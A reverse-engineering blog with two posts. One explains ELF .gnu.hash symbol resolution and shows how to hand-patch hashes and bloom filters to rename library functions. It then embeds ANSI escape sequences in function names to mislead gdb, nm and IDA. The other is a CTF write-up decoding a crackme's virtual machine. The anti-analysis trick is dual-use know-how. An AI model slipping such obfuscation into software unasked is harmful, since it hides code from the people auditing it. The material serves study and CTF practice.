The question is: how does the binary know where to look for the this_is_an_external_func_in_a_lib() call? It's obviously related to string comparison:


mitsurugi@raspi:~/resolv_func/blog$ strings proj libpoem.so | grep external
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Well, if we have the string this_is_an_external_func_in_a_lib in both the binary and the library, maybe that's how they are associated?

Proof: if you alter one of these strings, the program doesn't work anymore:

mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g proj > proj2
mitsurugi@raspi:~/resolv_func/blog$ chmod +x proj2
mitsurugi@raspi:~/resolv_func/blog$ ldd proj2
 linux-vdso.so.1 (0x7ed45000)
 libpoem.so => ./libpoem.so (0x76eed000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76dea000)
 /lib/ld-linux-armhf.so.3 (0x76f11000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj2
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

The same happens if you change the function in the library:

mitsurugi@raspi:~/resolv_func/blog$ mv libpoem.so libpoem.so.ori
mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g libpoem.so.ori > libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ chmod +x libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ ldd proj                //this is the unaltered binary
 linux-vdso.so.1 (0x7ea81000)
 libpoem.so => ./libpoem.so (0x76ede000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76ddb000)
 /lib/ld-linux-armhf.so.3 (0x76f02000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
./proj: symbol lookup error: ./proj: undefined symbol: this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Seems logical: it searches for the function by its name.

But wait, what if we change the name in BOTH? Would it work? The binary calls AAAA_is_an_external_func_in_a_lib(), the linker steps through all linked libraries, finds libpoem.so, opens it, reads the function names, finds it and calls it. Does it work?

mitsurugi@raspi:~/resolv_func/blog$ ./proj2 
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Still a fail, although we have the same name in the library and the binary:

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep external_func
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

3/ Read The Freaky Manual (If it exists...)

When you search for something, you can read the manual. But in this case, it won't help, because there is no manual.
When you google for symbol resolution, you'll end up with a lot of blog posts talking about PLT/GOT stuff. Very interesting (yes, read them, it's very valuable), but there is still magic in those blogposts. (In French: https://www.segmentationfault.fr/linux/role-plt-got-ld-so/ ).

And how do those blog posts explain how the resolution is made?


In the aforementioned blogpost, it just says: "it's a long and complicated code, but in the end, you get the address". I don't like magic in computing.

4/ No magic. Just show me. 

Here are the main links which could help you:
I'll try to summarize things. First, we have a hash section in ELF files:

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 890020b1 00c44289 08000000 0c000000 .. ...B.........
  0x00000138 0f000000 00af34e8 4245d5ec dea1eacc ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

This section contains a header, bloom filters, and hashes. Libc developers want binaries to run fast, and when you resolve symbols, you have to step through each symbol and do a strcmp: this is slow. So the developers added lots of improvements.

I wrote a parser for .gnu.hash sections (values are displayed in both little and big endian):

mitsurugi@raspi:~/resolv_func/blog$ ./hashparse.py libpoem.so
*** Get GNU HASH section for libpoem.so
[+] Ok, one line. Good
[+] GNU HASH mapping fits perfectly disk and memory layout
    starting at 0x00000118
    and size is 0x00004c long
*** Extracting .gnu.hash
*** Parsing...
[+] Header
3 hash buckets              //we'll use this number later
8 symndx
2 bloom masks
6 bloomshift (minimum 6)
[+] Part 2 - bloom masks
 Mask 0 : 0xb1200089L  | 0x890020b1L
 Mask 1 : 0x8942c400L  | 0xc44289
[+] Part 3 - N Buckets of hash
 Bucket 0 : 0x8  | 0x8000000
 Bucket 1 : 0xc  | 0xc000000
 Bucket 2 : 0xf  | 0xf000000
[+] Part 4 - Hashes
 Hash 0 : 0xe834af00L  | 0xaf34e8
 Hash 1 : 0xecd54542L  | 0x4245d5ec
 Hash 2 : 0xcceaa1deL  | 0xdea1eaccL      //pay attention to this hash
 Hash 3 : 0x7c92e3bb  | 0xbbe3927cL
 Hash 4 : 0x1b57dabe  | 0xbeda571bL
 Hash 5 : 0x1c5871d8  | 0xd871581cL
 Hash 6 : 0xef18db9  | 0xb98df10eL
 Hash 7 : 0x943c5476L  | 0x76543c94
 Hash 8 : 0xeefd3ea  | 0xead3ef0eL
 Hash 9 : 0x7997ef59  | 0x59ef9779
mitsurugi@raspi:~/resolv_func/blog$

4/1/ First speedup: Hash table.

To quickly find an object in a list, use a hash table. Hash tables are a convenient way to sort and find items in a list. The hash function used in the resolver is the djbx33a one:

static uint_fast32_t
dl_new_hash (const char *s)
{
  uint_fast32_t h = 5381;
  for (unsigned char c = *s; c != '\0'; c = *++s)
    h = h * 33 + c;
  return h & 0xffffffff;
}
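The same function in Python, which is roughly all my dl_new_hash.py script below does:

#! /usr/bin/python3
import sys

def dl_new_hash(s):
    h = 5381
    for c in s.encode():
        h = (h * 33 + c) & 0xffffffff   # same math as the C version above
    return h

print("[+] Calculating hash for", sys.argv[1])
print("Output is 0x%X" % dl_new_hash(sys.argv[1]))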

We can easily calculate the hash of our function:

mitsurugi@raspi:~/resolv_func/blog$ ./dl_new_hash.py this_is_an_external_func_in_a_lib
[+] Calculating hash for this_is_an_external_func_in_a_lib
Output is 0xCCEAA1DF
mitsurugi@raspi:~/resolv_func/blog$

We can find our hash in the .gnu.hash section: 0xcceaa1de (minus the lowest bit, but it's not significant when the solver compares hashes, although I spent too much time on this detail).

So, if you change the name of the function and its associated hash, it should work? No, not so easily. This is a hash table: you have to land in the same bucket. Long story short, your (new_hash % nbuckets) must be equal to (old_hash % nbuckets). nbuckets equals 3 in this library. Let's work with this number (a small brute-force sketch follows the list below):
  • this_is_an_external_func_in_a_lib : hash(func)%3 = 0xCCEAA1DF%3 = 0
  • AAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xEEA9C6CB%3 = 1 -> Not the same bucket, won't work
  • BAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xFFE18ACC%3 = 0 -> Good.
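Candidate names are easy to brute-force; a small sketch reusing dl_new_hash() from above:

#! /usr/bin/python3
import itertools, string

def dl_new_hash(s):
    h = 5381
    for c in s.encode():
        h = (h * 33 + c) & 0xffffffff
    return h

SUFFIX = "_is_an_external_func_in_a_lib"
TARGET_BUCKET = 0xCCEAA1DF % 3          # bucket of the original name

for prefix in itertools.product(string.ascii_uppercase, repeat=4):
    name = "".join(prefix) + SUFFIX
    if dl_new_hash(name) % 3 == TARGET_BUCKET:
        print(name, hex(dl_new_hash(name)))
        break                           # a matching name pops out almost immediately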

So, we change the name of the function, and change the hash to 0xFFE18ACC. Will it work? Still not: one last change to do.

4/2/ Second speedup: Bloom filter

Using hashes is a big speedup, but the libc maintainers added another big boost: a bloom filter. Its goal is to quickly reject unknown symbols. This bloom filter is made of another hash, and is used as a fast rejection process. If the bloom filter says no, the symbol is not in the file. If it passes, the symbol may or may not be in the file. Apparently, this gives a huge speedup in symbol resolution. That's clever, but I have to change my function name.

If you want to bypass this bloom filter, you can recalculate it. Or you can set all its bits to 1, which means: always pass. I'm not a programmer, I want things to work the way I want. So let's put all bits to 1, and not try to recalculate anything.

And after the bloom filter change, it will work, because the linker will say:
  • does it pass the bloom filter? Yes
  • does it have a hash? Yes
  • in the hash bucket, does a function with the same name exist? Yes
  • --> Symbol resolution is done, the code is here, work your way.

4/3/ First win:

We have to change the function name: easy, we use BAAA_is_an_external_func_in_a_lib
We have to break the bloom filter: easy, put all bits to 1
We have to change the hash value: easy, just take care of the bucket.

After some hex editing (all bytes have been changed by hand):


mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 ffffffff ffffffff 08000000 0c000000 ................
  0x00000138 0f000000 00af34e8 4245d5ec cc8ae1ff ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

Look at the bloom filter (all bits are 1), and the hash change.
And now, it works like a charm!


mitsurugi@raspi:~/resolv_func/blog$ ./proj2
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$ gdb -q proj2 
Reading symbols from proj2...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x000006ac <+0>: push {r7, lr}
   0x000006ae <+2>: sub sp, #8
   0x000006b0 <+4>: add r7, sp, #0
   0x000006b2 <+6>: blx 0x584 <BAAA_is_an_external_func_in_a_lib@plt>
   0x000006b6 <+10>: str r0, [r7, #4]
   0x000006b8 <+12>: ldr r3, [r7, #4]
   0x000006ba <+14>: mov r0, r3
   0x000006bc <+16>: adds r7, #8
   0x000006be <+18>: mov sp, r7
   0x000006c0 <+20>: pop {r7, pc}
End of assembler dump.
gdb$

As you can see, I'm calling the function BAAA_is_an_external_func_in_a_lib(), and it works.

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep BAAA
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

We know how to change a function name inside a binary and its lib without breaking anything!

5/ Now the fun part!

Ok, let's write a quick python patcher, called patch.py.
You can use anything in the range \x01-\xff for a function name. Changing one character in a function name is not fun enough. We can be good boyz (or girlz) and use internationalization: write UTF-8, and be happy with it. But did you know that your xterm interprets escape sequences? \e]34; will print everything in black. Let's write black on black and confuse reversers.

5/1/ Fun with ANSI escape code

We can use a function name containing ANSI escape codes. ANSI escape codes can be used to send a BEEP, blink characters, change the xterm name, change colors, and so on. Here is the fun part, where we change the xterm title when printing the function:

Fun, but can we do better? ANSI escape codes can go backward.
So, we can overwrite the function name:

Reading symbols from crack...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x00000688 <+0>: push {r7, lr}
   0x0000068a <+2>: add r7, sp, #0
   0x0000068c <+4>: blx 0x53c <calling@plt>
   0x00000690 <+8>: movs r3, #0
   0x00000692 <+10>: mov r0, r3
   0x00000694 <+12>: pop {r7, pc}
End of assembler dump.
(gdb) q
mitsurugi@raspi:~/resolv_func/blog$

and, the library says:

mitsurugi@raspi:~/resolv_func/blog$ nm libcrack.so | grep ' T '
000004fc T calling
0000050a T calling
00000518 T calling
00000528 T _fini
000003fc T _init
mitsurugi@raspi:~/resolv_func/blog$

Three functions with the same name?!?! Which one is the good one? You can spend a lot of time on this crackme with static analysis only.

Those functions are different. Their names are A\x1b[1Dcalling, B\x1b[1Dcalling and C\x1b[1Dcalling. The \x1b[1D sequence moves the cursor backward one character, so the first char gets overwritten.
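You can see the effect in any terminal; a one-line Python check:

#! /usr/bin/python3
for name in (b"A\x1b[1Dcalling", b"B\x1b[1Dcalling", b"C\x1b[1Dcalling"):
    print(name.decode())   # all three display as "calling": the cursor steps back over the first char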

5/2/ Fun with IDA

You can play with IDA. IDA doesn't recognize the characters and replaces them with _. How in the world would you debug a binary
calling functions ____() and ____() and ____() which are all different?
I think there is a lot of room for improvement here; I'll try to make another blogpost with funny sequences.


6/ The End

I think this blogpost is waaaaay too long, so I'll finish it here. The code will be posted to github; it's just a python script which patches addresses in the binary.

Today not possible. Tomorrow possible.
0xMitsurugi

mardi 30 janvier 2018

Solving a CTF chall the [academic|hardest] way (FIC2018)

My previous articles on solving a crackme have gained some attention, so I'm doing the next one (and the last, I promise). This time, I'll explain how to solve a crackme based on a VM. There is a lot more asm than in the previous solutions :-)

  1. http://0x90909090.blogspot.fr/2018/01/solving-ctf-chall-easylazy-way-fic2018.html
  2. http://0x90909090.blogspot.fr/2018/01/solving-ctf-chall-hardgood-way-fic2018.html
  3. http://0x90909090.blogspot.fr/2018/01/solving-ctf-chall-crazyomg-way-fic2018.html
This is a more academic blogpost, where I'll try to explain how to understand the logic behind the VM and the crackme.

1/ A bit of technique first.


Basically, when you implement a VM, you have to create a virtual CPU. This virtual CPU has its own registers, memory, and CPU flags. It fetches, decodes and executes instructions. Instructions are sequences of bits (for simplification, imagine a byte), and instructions can take 0 to N arguments.
If, in pseudocode, we want to compute 13 xor 37, we can imagine this instruction sequence:
  • PUT 13 in register (say, R1)
  • PUT 37 in another register (say, R2)
  • XOR R1 with R2
After that, it's just encoding. If PUT is encoded as 0x42, registers by their numbers, and XOR as 0xff, the logical sequence will be:
  • 0x42 0x13 0x1
  • 0x42 0x37 0x2
  • 0xff 0x1 0x2
Easy. That's just conventions. The program is: 0x421301423702ff0102

And the CPU will work with this. The instruction pointer is at offset 0x00.
  • Fetch: 0x42
  • Decode: that's a PUT. It takes 2 arguments: value, then register. Increase the instruction pointer by 3.
  • Execute: move the value at (instruction pointer + 1) into the register given at (instruction pointer + 2).

Next:
  • Fetch 0x42
  • and so on..

So if you want to break a VM, you have to learn where the instruction pointer is, where the registers are stored, and how to decode the assembly. You have to figure out that 0x42 is a PUT in the previous example. How? That's the difficulty.
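A toy fetch-decode-execute loop implementing just the two opcodes of the example (PUT = 0x42, XOR = 0xff):

#! /usr/bin/python3
code = bytes.fromhex("421301423702ff0102")
regs = {1: 0, 2: 0}
ip = 0
while ip < len(code):
    op = code[ip]                             # fetch
    if op == 0x42:                            # decode: PUT value, register
        regs[code[ip + 2]] = code[ip + 1]     # execute
        ip += 3
    elif op == 0xff:                          # XOR register, register
        regs[code[ip + 1]] ^= regs[code[ip + 2]]
        ip += 3
    else:
        raise ValueError("illegal instruction 0x%02x at 0x%02x" % (op, ip))
print(hex(regs[1]))                           # 0x13 ^ 0x37 = 0x24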

Now, back to our crackme. This is a VM, so we have a program which emulates a CPU. We have to find a big loop: the fetch-decode-execute loop. Once found, you'll know where the instruction pointer is, and where the instructions are.

Next, you'll have to understand the instructions. Once done, it's even easier: understand the program logic, break it, solve the chall, gain points.

2/ Find where things take place

Take time to read the assembly, and follow the dots 1, 2, 3...


mitsurugi@dojo:~/chall/FIC2018/v24$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x0000000000400530 <+0>: push   %rbx
   0x0000000000400531 <+1>: mov    $0x1000,%edi
   0x0000000000400536 <+6>: callq  0x400510 <malloc@plt>
   0x000000000040053b <+11>: or     $0xffffffff,%edx
   0x000000000040053e <+14>: test   %rax,%rax
   0x0000000000400541 <+17>: mov    %rax,0x2023d0(%rip)        # 0x602918 <stack>
   0x0000000000400548 <+24>: je     0x40059a <main+106>

//Here is a big loop. The fetch-decode-execute one, probably.
//We read something at 0x602914 (regs+20)
1.   0x000000000040054a <+26>: movslq 0x2023c3(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400551 <+33>: cmpb   $0xee,0x601440(%rax)       //if equals to 0xee goto end
     0x0000000000400558 <+40>: je     0x40058c <main+92>
3.   0x000000000040055a <+42>: mov    $0x602800,%ebx             //ebx will be incremented in steps of 0x10
     0x000000000040055f <+47>: mov    (%rbx),%edx                
     0x0000000000400561 <+49>: movslq 0x2023ac(%rip),%rax        # 0x602914 <regs+20>
     0x0000000000400568 <+56>: test   %edx,%edx  
     0x000000000040056a <+58>: je     0x400582 <main+82>         
4.   0x000000000040056c <+60>: movzbl 0x601440(%rax),%eax        //we fetch the byte @0x601440+rax
     0x0000000000400573 <+67>: cmp    %edx,%eax                  //if eax==edx we call something. That's decode part.
     0x0000000000400575 <+69>: jne    0x40057c <main+76>
     0x0000000000400577 <+71>: xor    %eax,%eax
5.   0x0000000000400579 <+73>: callq  *0x8(%rbx)                 //the call. Probably the execute part.
     0x000000000040057c <+76>: add    $0x10,%rbx
     0x0000000000400580 <+80>: jmp    0x40055f <main+47>         
     0x0000000000400582 <+82>: inc    %eax                       
//The regs+20 gets increased one by one -> so we step in the VM code probably.
2.   0x0000000000400584 <+84>: mov    %eax,0x20238a(%rip)        # 0x602914 <regs+20> 
     0x000000000040058a <+90>: jmp    0x40054a <main+26>

//from here, this is the end of the program
   0x000000000040058c <+92>: mov    0x202385(%rip),%rdi        # 0x602918 <stack>
   0x0000000000400593 <+99>: callq  0x4004c0 <free@plt>
   0x0000000000400598 <+104>: xor    %edx,%edx
   0x000000000040059a <+106>: mov    %edx,%eax
   0x000000000040059c <+108>: pop    %rbx
   0x000000000040059d <+109>: retq   
End of assembler dump.
gdb$ 

We almost understand how this VM works.

  • The instruction pointer is at regs+20 (0x602914), we fetch the instruction at 0x601440+the value in regs+20.
  • The byte is read, then compared to something on 0x602800, 0x602810, 0x602820 and so on. We say this is the decode part.
  • Then, the callq rbx+0x8 is the execute part.

Fetch, decode, execute.

We know how the virtual CPU works. Let's dive into the details. First, what do we have around the instruction pointer?


gdb$ x/16wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601450 <g_data+16>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601460 <g_data+32>: 0x00000000 0x00000000 0x00000000 0x00000000
0x601470 <g_data+48>: 0x00000000 0x00000000 0x00000000 0x00000000
gdb$

We have a lot of 00 (a NOP, maybe?). What's next?
gdb$ x/160wx 0x601440
0x601440 <g_data>: 0x00000000 0x00000000 0x00000000 0x00000000
 (snip ... snip ...snip)
0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb
0x601590 <g_data+336>: 0x000000bb 0xbbdd0100 0xbbcc3700 0x00000000
0x6015a0 <g_data+352>: 0x00bbdd01 0x00bbccd3 0x01000000 0x3d00bbdd
0x6015b0 <g_data+368>: 0x0000bbcc 0xdd010000 0xccc000bb 0x000000bb
0x6015c0 <g_data+384>: 0xbbdd0100 0xbbccde00 0x00000000 0x00bbdd01
0x6015d0 <g_data+400>: 0x00bbccab 0x01000000 0xad00bbdd 0x0000bbcc
0x6015e0 <g_data+416>: 0xdd010000 0xcc1d00bb 0x000000bb 0xbbdd0100
0x6015f0 <g_data+432>: 0xbbccea00 0x00000000 0x00bbdd01 0x00bbcc13
0x601600 <g_data+448>: 0x01000000 0x3700bbdd 0x0000bbcc 0xaa010000
0x601610 <g_data+464>: 0x000000bb 0xbb33f200 0x00000001 0x02bbaa7a
0x601620 <g_data+480>: 0xf3000000 0x0003bb33 0x66600000 0x990100ab
0x601630 <g_data+496>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601640 <g_data+512>: 0x000000bb 0xbb33f400 0x00000001 0x02bbaab2
0x601650 <g_data+528>: 0xf5000000 0x0003bb33 0x664e0000 0x990100ab
0x601660 <g_data+544>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x601670 <g_data+560>: 0x000000bb 0xbb33f600 0x00000001 0x02bbaab4
0x601680 <g_data+576>: 0xf7000000 0x0003bb33 0x66bb0000 0x990100ab
0x601690 <g_data+592>: 0x020000bb 0x02ab66f9 0x00bb9903 0xaaf90200
0x6016a0 <g_data+608>: 0x000000bb 0xbb33f800 0x00000001 0x02bbaae6
0x6016b0 <g_data+624>: 0xf9000000 0x0003bb33 0x66d40000 0x990100ab

The first non-zero byte is 0x55. This is probably the beginning of the code.
Now the decode part; let's look at what we have at 0x602800:
gdb$ x/20wx 0x602800
0x602800 <vm_func>: 0x00000011 0x00000000 0x00400696 0x00000000
0x602810 <vm_func+16>: 0x00000099 0x00000000 0x00400a40 0x00000000
0x602820 <vm_func+32>: 0x00000022 0x00000000 0x00400798 0x00000000
0x602830 <vm_func+48>: 0x00000033 0x00000000 0x00400697 0x00000000
0x602840 <vm_func+64>: 0x00000044 0x00000000 0x00400799 0x00000000
gdb$ x/x 0x00400696                  //What is there?
0x400696 <vm_ret>: 0x77058bc3   // oooh, the beginning of vm_ret :)
gdb$ x/x 0x00400a40
0x400a40 <vm_jnz>: 0x1ece058b   //and vm_jnz, and the others ^_^
gdb$

Ok. So the program reads a byte in the g_data part, then calls a function depending on this byte.

That's really, really a good point. We have a byte, and a function. It doesn't take long to understand that this is the assembly:

  • 0x11 is vm_ret  RETURN
  • 0x99 is vm_jnz  JUMP if NON ZERO
  • 0x22 is vm_cll  CALL
  • 0x33 is vm_mov  MOVE
  • 0x44 is vm_push PUSH
  • 0x55 is vm_ecl  ??
  • 0x66 is vm_cmp  COMPARE
  • 0x77 is vm_jmp  JUMP
  • 0x88 is vm_jzz  JUMP if ZERO
  • 0xaa is vm_mvp  ?? move? pointer maybe? 
  • 0xbb is vm_and  AND
  • 0xcc is vm_add  ADD
  • 0xdd is vm_xor  XOR
  • 0x00 is NOP (we guessed it)
  • 0xee is END (we guessed it also)

Ladies and gentlemen, the asm of the VM.

3/ Let's see what happens

So, the first byte is vm_ecl. In order to quickly run the binary, we break at 0x0000000000400573, only if $rax != 0:


gdb$ b * 0x0000000000400573 if $rax!=0
Breakpoint 3 at 0x400573
gdb$ c
Continuing.
gdb$ info reg rax
rax            0x55 0x55
gdb$ disass vm_ecl
Dump of assembler code for function vm_ecl:
   0x0000000000400d28 <+0>: mov    eax,DWORD PTR [rip+0x201be6]        # 0x602914 <regs+20>
   0x0000000000400d2e <+6>: lea    edx,[rax+0x1]
   0x0000000000400d31 <+9>: mov    DWORD PTR [rip+0x201bdd],edx        # 0x602914 <regs+20>
   0x0000000000400d37 <+15>: movsxd rdx,edx
   0x0000000000400d3a <+18>: mov    dl,BYTE PTR [rdx+0x601440]
   0x0000000000400d40 <+24>: cmp    dl,0xe1
   0x0000000000400d43 <+27>: je     0x400d6f <vm_ecl+71>
   0x0000000000400d45 <+29>: cmp    dl,0xe2
   0x0000000000400d48 <+32>: je     0x400de2 <vm_ecl+186>
   0x0000000000400d4e <+38>: cmp    dl,0xe0
   0x0000000000400d51 <+41>: jne    0x400e55 <vm_ecl+301>
(...)
   0x0000000000400d6a <+66>: call   0x400520 <exit@plt>
(...)
   0x0000000000400ddd <+181>: jmp    0x4004d0 <write@plt>
(...)
   0x0000000000400e50 <+296>: jmp    0x4004e0 <read@plt>

Well, a switch case. If the next byte is 0xe1, 0xe2 or 0xe0, this function behaves differently. We have read, write and exit functions in it. That should be for input/output. Let's step over for the moment, and see what happens:
gdb$ stepo
Temporary breakpoint 4 at 0x40057c
ENTER PASS :
gdb$

That's it. Let's go back to the VM disassembly a bit. We had:

0x601570 <g_data+304>: 0x00000000 0x0001e155 0x0c0d0300 0x0000e255
0x601580 <g_data+320>: 0x0cf20000 0x0000bb33 0xddf20000 0xcc1300bb

Put in the right order: 55 e1 01 00 00 03 0d 0c 55 e2 00 00 f2 0c 33 bb... 55 is I/O, e1 seems to be output, the numbers after are unknown (the address of the string, probably), and the next instruction should be 55 e2 (waiting for input). Let's see the next instruction:

gdb$ info reg rax
rax            0x0c 0x0c
gdb$

The next instruction is 0x0c?? As if the instruction pointer missed a step (?).
In our case, that's not really important, because 0xc is not a valid instruction: the main loop will try all vm_functions, fail to match, increment the pointer, then read the 0x55. Let's continue, stepping over the vm_ecl function:

gdb$ stepo
Temporary breakpoint 5 at 0x40057c
ABCDEFABCDEF                       //entered myself
0x0000000000400580 in main ()
gdb$
gdb$ x/x 0x602914
0x602914 <regs+20>: 0x00000143    //offset of the instruction pointer
gdb$ x/wx 0x601440+0x143
0x601583 <g_data+323>: 0x00bb330c    //the instruction pointer
gdb$

and once again, the 0x0c invalid instruction. vm_ecl doesn't increment the instruction pointer all the way to the next instruction. The VM is built in such a way that it doesn't matter, as long as the skipped byte is an invalid instruction... This is kind of a bug!

Let's fast forward a bit, until a 0xdd instruction (XOR):

Now, a bit of refactoring. This is just the VM assembly extracted from g_data:
0xdd 0xbb 0x00 0x13                //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0x37                //vm_xor
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01 //vm_add
0xdd 0xbb 0x00 0xd3
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0x3d
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01
0xdd 0xbb 0x00 0xc0
0xcc 0xbb 0x00 0x00 0x00 0x00 0x01

See a pattern? 0xbb should be an offset to somewhere, the XOR operand is the key, and we slide this offset one by one. In pseudocode, it becomes:

xor(pass[i], 0x13)
i = i+1
xor(pass[i], 0x37)
i = i+1
etc...

We extract the key, 0x1337d33dc0, just by reading the vm assembly.
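That reading is easy to automate; a sketch using the instruction lengths seen above (vm_xor: 4 bytes, vm_add: 7 bytes):

#! /usr/bin/python3
code = bytes.fromhex("ddbb0013" "ccbb0000000001"
                     "ddbb0037" "ccbb0000000001"
                     "ddbb00d3" "ccbb0000000001"
                     "ddbb003d" "ccbb0000000001"
                     "ddbb00c0" "ccbb0000000001")
key, ip = [], 0
while ip < len(code):
    if code[ip] == 0xdd:      # vm_xor: the key is the 4th byte
        key.append(code[ip + 3])
        ip += 4
    elif code[ip] == 0xcc:    # vm_add: 7-byte instruction, skip it
        ip += 7
    else:
        ip += 1
print(bytes(key).hex())       # 1337d33dc0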

And what about the instruction pointer? Does it point to the right instruction after a vm_xor?

gdb$ info reg rax
rax            0xcc 0xcc
gdb$

Yep, it works: the vm_xor instruction advances the instruction pointer correctly.

The next steps are to understand the other vm_XXX instructions, where data is stored, what is done with it, and so on.

Just step through the functions and mark all known addresses (base address, offsets, registers, CPU flags), and you'll quickly be able to reverse any VM code. Follow the vm_cmp instruction, learn where the offsets are, and compare the bytes yourself.

4/ Why does the crackme accept more than one solution?

As we saw, sometimes the instruction pointer is not incremented to the next instruction. If the instruction is illegal, nothing happens. But if the instruction pointer falls on a known instruction, a different behavior occurs.
0xF4b found that vm_mov is also buggy: a 0xbb instruction (vm_and) is called instead of the vm_cmp, and the JNZ is never taken afterwards.

5/ Conclusion

Thank you for scrolling this far ;-) Learn to pwn crackmes.
If you want the a.out file to play with, drop me a DM or an email.

Those who want to do will find a way. 
Those who don't want to do search an excuse.
0xMitsurugi